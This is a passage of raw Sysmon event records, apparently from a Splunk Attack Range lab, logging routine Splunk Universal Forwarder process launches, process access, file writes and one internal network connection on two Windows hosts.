Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104826Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.506{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B407-615A-FF01-00000000FC01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104825Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.507{58E9C193-B407-615A-FF01-00000000FC01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104824Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.115{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF5C92875FA0C0CFF3BD9A1C6F5E36C,SHA256=F54CBF55993C665E8EBC6ED507215F25D53316F519B525D58D940227D799B2E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104823Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.084{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F387DA546EF11D8701223931DFCD32,SHA256=D801173D99B7711D08A34A8DF3BA39254CF318A616988003C17C753FD8042A07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104822Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:59.084{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BE511FFAE9B68A8200CF1BF80CA38C8,SHA256=1C201330C97B6F34B3CC5E31E17C74BDD921C967A78FD16377A18A5352B35560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082746Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:00.740{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34EF4D9BB2CDBA2FDA54309DD1D4AC2F,SHA256=DB5D19AF7DE0092718B50726B9B6F32070BBE886C73095B04F477010D5AAB43B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104845Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.537{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54F387DA546EF11D8701223931DFCD32,SHA256=D801173D99B7711D08A34A8DF3BA39254CF318A616988003C17C753FD8042A07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104844Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B408-615A-0002-00000000FC01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104843Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104842Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104841Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104840Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104839Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B408-615A-0002-00000000FC01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104838Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.381{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B408-615A-0002-00000000FC01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104837Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.383{58E9C193-B408-615A-0002-00000000FC01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104836Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:00.115{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C1FEBE193DD87F7FFC9EA8B4CE62F2,SHA256=45C68FF915FF741AFE5D4E1845B483B98A38546CF3B5344EB53778AD39209FED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082747Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:01.740{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=744EA5438B0EFE041680037A183093B3,SHA256=6E07879FA1B70C3868F7BE8D06053EAEF033FDD5F0B14CE719FAA2114E7C5B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104846Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:01.115{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44ABBDEDBC0D7DF916CE9C5D119D33FA,SHA256=E93D99DAC1350F84981AB6374CFF4D56E7E73935054368A74D120A0F4CC4F6E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082748Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:02.755{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF6C603A583A51C1548F43FCD4B68BCE,SHA256=168B2A4EA47B407F4AB0E3017A98A0FC12DF801252C23477979E65BF60BC9512,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104857Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:01.416{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51732-false10.0.1.12-8000- 10341000x8000000000000000104856Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.381{58E9C193-B40A-615A-0102-00000000FC01}10124752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104855Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B40A-615A-0102-00000000FC01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104854Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104853Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104852Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104851Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104850Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B40A-615A-0102-00000000FC01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104849Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.209{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B40A-615A-0102-00000000FC01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104848Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.210{58E9C193-B40A-615A-0102-00000000FC01}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104847Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:02.131{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B979BAECF9E9069B9655F8017AFFF29D,SHA256=814ECB1A6FD89F02C4635BE2C7203402C434EDD308CD038D235D7767779CC039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082750Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:03.755{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB23951B6312EB20189EBA1608045465,SHA256=F77A62E47FD3734EB358CD74DAC6CE2FEDB23A83A6FFF2919E4E6453F444EB29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104876Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.881{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B40B-615A-0302-00000000FC01}1452C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104875Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:03.881{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104874Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 